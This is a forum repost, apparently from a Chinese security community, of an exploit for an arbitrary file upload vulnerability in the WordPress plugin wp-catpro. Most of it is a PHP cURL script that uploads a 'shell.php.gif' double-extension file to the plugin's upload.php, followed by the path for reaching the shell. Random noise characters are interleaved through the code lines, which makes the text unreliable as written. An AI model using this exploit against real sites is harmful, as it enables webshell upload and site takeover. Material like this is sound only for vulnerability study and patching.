找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1958|回复: 0
打印 上一主题 下一主题

WordPress插件wp-catpro任意文件上传

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 20:12:43 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
% s( g: l  d: e, S9 i#-----------------------------------------------------------------------$ g) z. Z# S5 B
( a3 N* b2 m* P; O
作者  => Zikou-16
8 `% O: k9 c3 M3 {邮箱 => zikou16x@gmail.com
7 Y" ~# r' E9 s$ C/ H$ s测试系统 : Windows 7 , Backtrack 5r3- W; J4 L) U& B$ j( _1 g8 D8 J: B
下载地址 : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
- W7 }/ U! i. y- Z" J$ w####
& Z- A: K9 \. Z( v: y
' a! Y7 z7 X+ b4 `+ {. }#=> Exploit 信息:
/ O) U( Q4 [8 p------------------8 B$ y$ T" O7 S( X, r
# 攻击者可以上传 file/shell.php.gif' T( n" M1 t* G1 m0 `
# ("jpg", "gif", "png")  // Allowed file extensions
; \' O- v, H! x$ h1 L  Z! O# "/uploads/";  // The path were we will save the file (getcwd() may not be reliable and should be tested in your environment)
  C- Z! _- `$ G5 P8 P# R# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)" a0 \& j+ Y- W! t( {- ?7 a) y- B, ?
------------------
5 y+ s$ Z0 b9 O( J0 x; R5 Y! ~; g- ^
1 D3 D' E, |3 F* F. H#=> Exploit, O7 ~) d. U$ `4 L
-----------$ v7 a5 {; j% {2 f3 D! B! N- i4 ~
<?php
5 t" ^3 M- H/ F* C
0 M; I3 x6 o  f% S$ b. c" Z$uploadfile="zik.php.gif";
1 e' [1 ~6 W2 s& ?# J$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
1 M8 Q/ K6 i& Y3 S) X: Bcurl_setopt($ch, CURLOPT_POST, true);+ x( ]' u& @' J& p: i' u
curl_setopt($ch, CURLOPT_POSTFIELDS,3 q) q! T0 |( P1 R- P
array('Filedata'=>"@$uploadfile",
/ M. k7 }5 Y  D'folder'=>'/wp-content/uploads/catpro/'));( @4 o" _' G9 c& P3 e9 g6 k
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);% P5 @# z& I: q
$postResult = curl_exec($ch);3 m( \. g5 c9 k* g- R$ a
curl_close($ch);
7 P" x9 D1 j5 k2 }3 ] : R1 v, {( ]3 d% |# U7 a* K! Q
print "$postResult";& M4 O& O4 \! p3 X: U* Y

3 u5 z' O9 u; N6 @- o6 e: MShell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
" V3 D, o2 |& b2 H  ?># c5 n0 B/ t. x5 O
<?php- Q4 d* d* h3 ~! m
phpinfo();0 X' S6 r. N; T) Q: V
?>
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表